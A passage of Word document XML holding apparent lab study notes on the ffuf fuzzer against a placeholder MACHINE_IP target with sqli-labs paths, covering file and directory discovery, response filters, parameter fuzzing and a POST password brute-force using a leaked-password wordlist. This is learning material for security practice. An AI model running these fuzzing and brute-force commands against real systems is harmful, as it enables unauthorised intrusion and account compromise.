      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DC6CBD">
        <w:t>ffuf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DC6CBD">
        <w:t xml:space="preserve"> -u </w:t>
      </w:r>
      <w:hyperlink r:id="rId74" w:history="1">
        <w:r w:rsidRPr="00115359">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://MACHINE_IP/indexFUZZ -w /usr/share/seclists/Discovery/Web-Content/web-extensions.txt</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1367AD33" w14:textId="6FAA1966" w:rsidR="00DC6CBD" w:rsidRDefault="00DC6CBD" w:rsidP="00DC6CBD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>try list of generic words with extensions and apply known good extensions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B9D3FE9" w14:textId="5B5746B2" w:rsidR="00DC6CBD" w:rsidRDefault="00DC6CBD" w:rsidP="00DC6CBD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DC6CBD">
        <w:t>ffuf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DC6CBD">
        <w:t xml:space="preserve"> -u http://MACHINE_IP/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-words-lowercase.txt -e .php,.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E3FFCD2" w14:textId="2CF16C22" w:rsidR="00DC6CBD" w:rsidRDefault="00DC6CBD" w:rsidP="00DC6CBD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>fuzzing directories</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44CE2101" w14:textId="63626AA4" w:rsidR="00DC6CBD" w:rsidRDefault="00DC6CBD" w:rsidP="00DC6CBD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DC6CBD">
        <w:t>ffuf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DC6CBD">
        <w:t xml:space="preserve"> -u </w:t>
      </w:r>
      <w:hyperlink r:id="rId75" w:history="1">
        <w:r w:rsidRPr="00115359">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://MACHINE_IP/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4BDA6EB9" w14:textId="7544138F" w:rsidR="00DC6CBD" w:rsidRDefault="00DC6CBD" w:rsidP="00DC6CBD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Using Filters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22DDA701" w14:textId="063B5492" w:rsidR="00DC6CBD" w:rsidRDefault="00DC6CBD" w:rsidP="00DC6CBD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>hiding responses with a given HTTP status code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D282B06" w14:textId="60935557" w:rsidR="00DC6CBD" w:rsidRDefault="00DC6CBD" w:rsidP="00DC6CBD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>-fc (filter code)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F3DCB31" w14:textId="206358F1" w:rsidR="00DC6CBD" w:rsidRDefault="00DC6CBD" w:rsidP="00DC6CBD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DC6CBD">
        <w:t>ffuf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DC6CBD">
        <w:t xml:space="preserve"> -u http://MACHINE_IP/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-files-lowercase.txt -fc 403</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E57DE75" w14:textId="316C5D6A" w:rsidR="00DC6CBD" w:rsidRDefault="00DC6CBD" w:rsidP="00DC6CBD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>filter out multiple status codes (-mc)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="254888DF" w14:textId="15A1D3A1" w:rsidR="00DC6CBD" w:rsidRDefault="00DC6CBD" w:rsidP="00DC6CBD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DC6CBD">
        <w:t>ffuf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DC6CBD">
        <w:t xml:space="preserve"> -u http://MACHINE_IP/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-files-lowercase.txt -mc 200</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C408E5E" w14:textId="0E62677B" w:rsidR="00DC6CBD" w:rsidRDefault="00DC6CBD" w:rsidP="00DC6CBD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>returns only specified code finds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70289267" w14:textId="0279D40B" w:rsidR="00DC6CBD" w:rsidRDefault="00841BBA" w:rsidP="00841BBA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>find all files beginning with a dot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16C86318" w14:textId="4F1C460E" w:rsidR="00841BBA" w:rsidRDefault="00841BBA" w:rsidP="00841BBA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00841BBA">
        <w:t>ffuf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00841BBA">
        <w:t xml:space="preserve"> -u http://MACHINE_IP/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-files-lowercase.txt -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00841BBA">
        <w:t>fr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00841BBA">
        <w:t xml:space="preserve"> '/</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00841BBA">
        <w:t>\..</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00841BBA">
        <w:t>*'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AB86A38" w14:textId="3AFA9CE8" w:rsidR="00841BBA" w:rsidRDefault="00841BBA" w:rsidP="00841BBA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Fuzzing Parameters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B623717" w14:textId="365B36C1" w:rsidR="00841BBA" w:rsidRDefault="00841BBA" w:rsidP="00841BBA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>use to fuzz parameters to detect file inclusion, path disclosure, XSS, SQLi, and command injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F972B8E" w14:textId="77777777" w:rsidR="00841BBA" w:rsidRDefault="00841BBA" w:rsidP="00841BBA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ffuf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -u 'http://MACHINE_IP/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sqli</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-labs/Less-1/?FUZZ=1' -c -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>fw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 39</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64504D19" w14:textId="388D7C98" w:rsidR="00841BBA" w:rsidRDefault="00841BBA" w:rsidP="00841BBA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">$ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ffuf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -u 'http://MACHINE_IP/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sqli</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-labs/Less-1/?FUZZ=1' -c -w /usr/share/seclists/Discovery/Web-Content/raft-medium-words-lowercase.txt -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>fw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 39</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26F19B60" w14:textId="1979C193" w:rsidR="00841BBA" w:rsidRDefault="00841BBA" w:rsidP="00841BBA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>fuzzing values with</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F03E849" w14:textId="78EE8A96" w:rsidR="00841BBA" w:rsidRDefault="00841BBA" w:rsidP="00841BBA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>-w –</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67E02690" w14:textId="14B89E29" w:rsidR="00841BBA" w:rsidRDefault="00841BBA" w:rsidP="00841BBA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ffuf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> will read wordlist from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>stdout</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="09983F93" w14:textId="72FAFF9B" w:rsidR="00841BBA" w:rsidRDefault="00841BBA" w:rsidP="00841BBA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">generates a list of integers with a command of user choice then pipe output to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ffuf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="53E43B71" w14:textId="77777777" w:rsidR="00841BBA" w:rsidRDefault="00841BBA" w:rsidP="00841BBA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>$ ruby -e '(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>0..</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>255).each{|</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">| puts </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">}' | </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ffuf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -u 'http://MACHINE_IP/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sqli</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-labs/Less-1/?id=FUZZ' -c -w - -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>fw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 33</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75C93B7C" w14:textId="77777777" w:rsidR="00841BBA" w:rsidRDefault="00841BBA" w:rsidP="00841BBA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>$ ruby -e 'puts (</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>0..</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>255).</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>to_a</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">' | </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ffuf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -u 'http://MACHINE_IP/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sqli</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-labs/Less-1/?id=FUZZ' -c -w - -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>fw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 33</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43FBF14B" w14:textId="77777777" w:rsidR="00841BBA" w:rsidRDefault="00841BBA" w:rsidP="00841BBA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">$ for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> in {</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>0..</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>255}; do echo $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">; done | </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ffuf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -u 'http://MACHINE_IP/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sqli</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-labs/Less-1/?id=FUZZ' -c -w - -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>fw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 33</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33649DCB" w14:textId="77777777" w:rsidR="00841BBA" w:rsidRDefault="00841BBA" w:rsidP="00841BBA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">$ seq 0 255 | </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ffuf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -u 'http://MACHINE_IP/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sqli</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-labs/Less-1/?id=FUZZ' -c -w - -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>fw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 33</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="222CD44C" w14:textId="284CE155" w:rsidR="00841BBA" w:rsidRDefault="00841BBA" w:rsidP="00841BBA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">$ cook '[0-255]' | </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ffuf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -u 'http://MACHINE_IP/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sqli</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-labs/Less-1/?id=FUZZ' -c -w - -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>fw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 33</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="286D4F00" w14:textId="107C95C1" w:rsidR="00841BBA" w:rsidRDefault="00841BBA" w:rsidP="00841BBA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>use for wordlist-based brute-force attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1689BDBF" w14:textId="767EF2ED" w:rsidR="00841BBA" w:rsidRDefault="00841BBA" w:rsidP="00841BBA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00841BBA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
        </w:rPr>
        <w:t>﻿</w:t>
      </w:r>
      <w:r w:rsidRPr="00841BBA">
        <w:t xml:space="preserve">$ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00841BBA">
        <w:t>ffuf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00841BBA">
        <w:t xml:space="preserve"> -u http://MACHINE_IP/sqli-labs/Less-11/ -c -w /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00841BBA">
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00841BBA">
        <w:t>/share/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00841BBA">
        <w:t>seclists</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00841BBA">
        <w:t>/Passwords/Leaked-Databases/hak5.txt -X POST -d '</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00841BBA">
        <w:t>uname</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00841BBA">
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00841BBA">
        <w:t>Dummy&amp;passwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00841BBA">
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00841BBA">
        <w:t>FUZZ&amp;submit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00841BBA">
        <w:t>=Submit' -fs 1435 -H 'Content-Type: application/x-www-form-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00841BBA">
        <w:t>urlencoded</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00841BBA">
        <w:t>'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F3A6980" w14:textId="49C5952E" w:rsidR="00841BBA" w:rsidRDefault="00841BBA" w:rsidP="00841BBA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>use POST method (-X) and give POST data (-d) to include FUZZ keyword</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BF8D510" w14:textId="18BFB7EC" w:rsidR="00841BBA" w:rsidRDefault="00841BBA" w:rsidP="00841BBA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>specify customer head (-H) to set content-type header</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DFFA457" w14:textId="7D243282" w:rsidR="00841BBA" w:rsidRDefault="00841BBA" w:rsidP="00841BBA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>curl would do this automatically</w:t>
      </w:r>
    </w:p>
